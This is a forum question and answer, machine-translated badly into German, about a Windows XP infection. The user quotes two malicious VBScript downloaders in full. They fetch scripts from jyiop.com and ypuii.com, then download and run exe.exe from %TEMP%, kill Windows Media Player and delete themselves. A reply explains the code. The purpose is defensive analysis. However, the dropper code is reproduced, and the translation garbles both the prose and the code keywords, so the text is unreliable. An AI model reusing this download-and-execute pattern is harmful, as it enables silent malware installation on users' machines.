Frage : Könnte ein Experte bitte versuchen, diesen VBS Code zu deuten

Hallo experts

A hat Freund etwas ungewöhnliches Verhalten mit ihrem Computer Windows- XpSP3 IE7 über den letzten Paaren der Tage gesehen, denen ich von tief misstrauisch bin.  Ich beobachtete, dass es geschehend über einem VNC Anschluss, gerade, das ein Fenster der kurzen Zeit ago.

A CMD.EXE oben knallt und sich offensichtlich waits.
A VBS Akte Notepad.
When im Notizblock ist geschlossen, das CMD Fenster closes.

I morgens recht sure öffnet, dass dieses ein böswilliger Index ist, der versucht, die VBS Akte laufen zu lassen, ohne das Programm zu spezifizieren (CScript oder WScript) um es laufen zu lassen, und weil ich die Rückstellungsklage auf die meiste „Index“ Art Aktenarten auf „redigiere“ Tätigkeit (Notizblock) eher als eingestellt habe, ist „geöffnete“ das (Index durchführen), die böswillige Tätigkeit vermutlich failing.

On die erste Gelegenheit, die ich nicht zeugte, war die Akte „yb.vbs“ im Notizblock vom Faltblatt %TEMP% des Benutzers mit dem folgenden Inhalt geöffnet:

1:

B= " yb.vbs ": Mit CreateObject („MSXML2.XMLHTTP“): .open „ERHALTEN“, „http://jyiop.com/kr/yb.vbs“, falsch: .send (): Einstellen A = CreateObject („Scripting.FileSystemObject“): D=A.CreateTextFile einstellen (A.GetSpecialFolder (2) +“ \ „+ B): D.WriteLine .responseText: Ende mit: D.Close: CreateObject („WScript.Shell“). A.GetSpecialFolder laufen lassen (2) +“ \ „+ B

I lud sicher „ http://jyiop.com/kr/yb.vb s“ herunter und sah, dass der Inhalt grob „geverdunkelt“ wurde, indem man wie gezeigt einige der Parameter unten aufhob:

1: 2: 3: 4: 5: 6: 7: 8:

w=3000: x=200: y=1: z=false: a = „http://jyiop.com/kr/hy/_q.php?&“: Einstellen e = Createobject (StrReverse („tcejbOmetsySeliF.gnitpircS“)): b = e.GetSpecialFolder (2) u.“ \ exe.exe ": OT = „ERHALTEN“: Einstellen c = CreateObject (StrReverse („PTTHLMX.2LMXSM“)): Einstellen d = CreateObject (StrReverse („maertS.BDODA“)) o=Createobject (StrReverse („tcejbOmetsySeliF.gnitpircS“ einstellen)) Auf Störung zunächst wieder aufnehmen c.open OT, a, z: c.send () Wenn c.Status = x dann u=c.ResponseBody: d.Open: d.Type = y: d.Write u: d.SaveToFile b: d.Close Beenden wenn CreateObject (StrReverse („llehS.tpircSW“)).eXeC b: CreateObject (StrReverse („llehS.tpircSW“)).eXeC „taskkill /F /IM wmplayer.exe“: g=o.GetFile (e.GetSpecialFolder (2) u.“ \ „u. StrReverse („sbv.by“)) einstellen: g.Delete: WScript.Sleep w: g=o.GetFile einstellen (B): g.Delete

I lud sicher das bezogene „ das http://jyiop.com/kr/hy/_q .php“, zum dieses Codes aufzudecken:

1:

I wissen, dass es nicht immer möglich ist, eine *.php Akte von einem Bediener intakt zu erhalten mit normalen Mitteln (IE. Eine Verbindung zu ihr und zum Right-Click > außer Ziel wie > außer bilden, wie *.htm Akte des gleichen Namens) und mit dem korrekten Code, damit gerade sein kann die Antwort des Bedieners zu meinem Versuch, das file.

Assuming herunterzuladen, das Relative URL gleichstellt:   http://jyiop.com/kr/_yoyk. php
then, das http://www.google.com
I morgens dieses System mit http://www.google.co.uk als das Home Page allein prüfend löst, also ich wissen, dass es nicht gerade zu meinem Home Page.

On die folgende Gelegenheit umadressiert, die ich über VNC zeugte, das, ein Befehl offensichtlich, die Akte „uor.vbs“ vom Faltblatt %TEMP% des Benutzers in einem Befehlsfenster laufen zu lassen herausgegeben wurde und Notizbuch den knallte Index oben, enthalten:

1:

B= " uor.vbs ": Mit CreateObject („MSXML2.XMLHTTP“): .open „ERHALTEN“, „http://ypuii.com/k_/uor.vbs“, falsch: .send (): Einstellen A = CreateObject („Scripting.FileSystemObject“): D=A.CreateTextFile einstellen (A.GetSpecialFolder (2) +“ \ „+ B): D.WriteLine .responseText: Ende mit: D.Close: CreateObject („WScript.Shell“). A.GetSpecialFolder laufen lassen (2) +“ \ „+ B

Safely Downloading und Öffnung „ http://ypuii.com/k_/uor.v bs“ in einem Maskeneditor deckte die selben wie vor, IE auf. aufgehobenes strings.

Now, habe ich gefunden, dass „GetSpecialFolder (2)“ bezieht sich das auf Faltblatt %TEMP% des Benutzers, und ich kann sehen, dass der Index die VBS Akte herunterlädt und schnell ein VBScript verursacht, indem er Schnüre und aufgehobene Schnüre verkettet, aber ich bin von genau unsicher, was ein Index so ist, versuchend tuend oder zu do.

I morgens nicht sehr vertraut mit VBS anders als etwas grundlegenden Verbrauch, also sind die folgenden Hinweise ein Puzzlespiel zu mir:

maertS.BDODA = ADOBD.Stream

c.open OT, a, z: c.send ()
If c.Status = x Then
u=c.ResponseBody: d.Open: d.Type = y: d.Write u: d.SaveToFile b: d.Close

I kann wie Tag so deutlich sehen, dass Windows Media Player weg getötet wird, wenn es läuft (die es nicht zu den materiellen Zeiten war), aber ich wundere mich, warum ein Index this.

One andere anscheinend bedeutende Ausgabe ist tun würde, dass ich ein „vor kurzem geschriebenes URL“ in der IE-Adressen-Stabdrop-down-Liste des Benutzers entdeckte:
http://ypuii.com/k_/zcus/e fmjcg.pdf
I könnte nicht finden, dass die Akte, die nirgends auf dem Computer und ihr des Benutzers cachiert wird, nicht sogar zurückrufen kann, als sie letztes öffnete eine pdf-Akte in ihrem Browser haben würde.  Ich speicherte diese pdf-Akte und, auf Kontrolle in einem Maskeneditor, kann ich irgendeinen Textinhalt als irgendeine Art vorbereitet Code und Hinweis auf „Javascript“ sehen.  Das folgende ist auch in einem Maskeneditor frei:

/Author (MllZTgg yZ=ssA f V)
/gZ (. b LPD tv/-Xqrf4dY3M s_JUNCVZa #8l=z 96yp2x: S5Rm k O 0&uFOcj% ihwBQn E K7gATGe H? I1W)
/Title (Ng JGgG qgMpr#AZMZH?)
/Keywords (Mokomeuapaualimajsi)
/Creator (Kotefekjoesito)
/ModDate (D: 20100621095906)
/Producer (820d5Deawohigejoxamogoga) nimmt

Googling gerade der „Schöpfer“ Namens„Kotefekjoesito“ mich zu dieser Seite:
http://jsunpack.jeek.org/d ec/go? report=c4cc162b45e937762035f286406a989f2adf2753
where zeigt es offenbar, dass die Akte Malicious.

I kann, dass der frühere Hinweis im VBScript auf „ADOBD.Stream“ ein Hinweis auf „Adobe“ ist und zu einem Strom in einer böswillig in Handarbeit gemachten pdf-Akte nur schätzen ist.  Ich kann nur annehmen, dass dieses entweder der Anfang der Ausgabe war oder, dass es war, eine Akte durch einen böswilligen Index holte, aber ich nicht gedacht haben würde, dass er das URL der vor kurzem geschriebenen URL-Liste hinzugefügt haben würde.  Das verwirrt in itself.

Probably, nicht, das eine Übereinstimmung ist, dass googling StrReverse („maertS.BDODA " ) mich auch zum „ http://jsunpack.jeek.org " Aufstellungsort mit dieser Seite nimmt:
http://jsunpack.jeek.org/d ec/go? report=5d7727607489f01840f34855c5664e662488962e
but, das es nicht sagt, dass das malicious.

Could jemand ist, bitte beraten mich, was dieser erste Index wahrscheinlich ist, (oder, um zu tun) auf dem Computer des Benutzers versucht zu haben getan zu haben.  Ich möchte wissen, wo ich stehe, weil ein voller System Antivirus- + RootKitscan keine positiven Ergebnisse erbracht hat und ich kann keine Hinweise auf den VBS Akten im registry.

Thanks

Bill
im Voraus sehen

Antwort : Könnte ein Experte bitte versuchen, diesen VBS Code zu deuten

Ich bin nicht bereit, bis zu dem Öffnen der Web site, die Sie jedoch, erwähnten von den Indexen oben, zu gehen bin hier, was ich sehe…

Index 1 verursacht eine unbelegte Akte, Verbindungen zu einer Web site und zu den Downloads der Inhalt der Seite und Dumps es in die unbelegte Akte.  Diese Akte gespeichert als „yb.vbs“ und soll durchführen.
-------------------------------------------------------------------
B= " yb.vbs "
Mit CreateObject („MSXML2.XMLHTTP“)
      .open „ERHALTEN“, „http://jyiop.com/kr/yb.vbs“, falsch
      .send ()
      Einstellen A = CreateObject („Scripting.FileSystemObject“)
      Einstellen D = A.CreateTextFile (A.GetSpecialFolder (2) + „\“ + B)
      D.WriteLine .responseText
Ende mit
D.Close
CreateObject („WScript.Shell“). A.GetSpecialFolder laufen lassen (2) +“ \ „+ B
-------------------------------------------------------------------
Schritt 2, nun da die vbs Akte und Durchlauf hergestellt worden, versucht es, eine andere Webseite zu besuchen, aber dieses mal speichert den Webseiteninhalt in eine Akte, die „exe.exe“ genannt.  Diese neue Akte soll in das Benutzer Tempfaltblatt gespeichert werden.
Der Index laufen lässt dann die Akte „exe.exe“.
Wie Sie erwähnten, stoppt taskkill Windows Media Player - warum, das?!? weiß!
Der Index löscht dann den vb Index, den Schritt 1 verursachte (der Index, der z.Z. läuft).
Es gibt eine zweite Wartezeit 3, dann, welches die Akte „exe.exe“ gelöscht.

Dieses Teil;
[maertS.BDODA = ADOBD.Stream
c.open OT, a, z: c.send ()
Wenn c.Status = x dann
u=c.ResponseBody: d.Open: d.Type = y: d.Write u: d.SaveToFile b: d.Close]
ist der Index, der schreibt, um eine Akte zu öffnen, die in der Webseite - nichts, mit Adobe zu tun strömt.  „c.Status“ - der Index wartet, dass die Webseite bereit und gepasst ist herunterzuladen. „u=c.ResponseBody“ nimmt die Webseite und schiebt sie in eine Variable.  Der Strom geöffnet und der Text herunterladen in die Variable rladen.  Die Akte gespeichert und geschlossen.  In diesem Index gespeichert die Webseite/die Akte in das Tempfaltblatt als „exe.exe“.

Die reale Gefahr ist dass „exe.exe“ Akte.  Sobald sie laufen gelassen worden, gibt es kein Erklären, was es entworfen, um zu tun.

Dieser Computer angesteckt noch mit einem Virus.  Das Programm „exe.exe“ könnte andere Viren im Hintergrund herunterladen haben, um Scans des Systems zu behindern.  Die Tatsache, dass Sie das geöffnete Befehlsfenster sehen können und der Index versucht, um zu laufen erklärt mir, dass es irgendeine böswillige noch zurückbleibende Akte gibt.

Es kann Zeit sein, auszuwerten, welche Notwendigkeiten, von dieser Maschine gespeichert zu werden und mit einer Wiedereinsetzung von Windows und von Anwendungen wieder beginnen.  Es klingt drastisch, aber sehend, während das Antivirus nichts aus Art heraus ich ermittelt, denken, dass Sie im Augenblick keiner Rückkehr sind.  An das, solange der böswillige Code dort eingeschaltet ist, irgendein erinnern fahren; sei es USB-Gedächtnisstock, Kamera etc., kann das Virus/das Trojan möglicherweise enthalten, wenn es zur Maschine angebracht.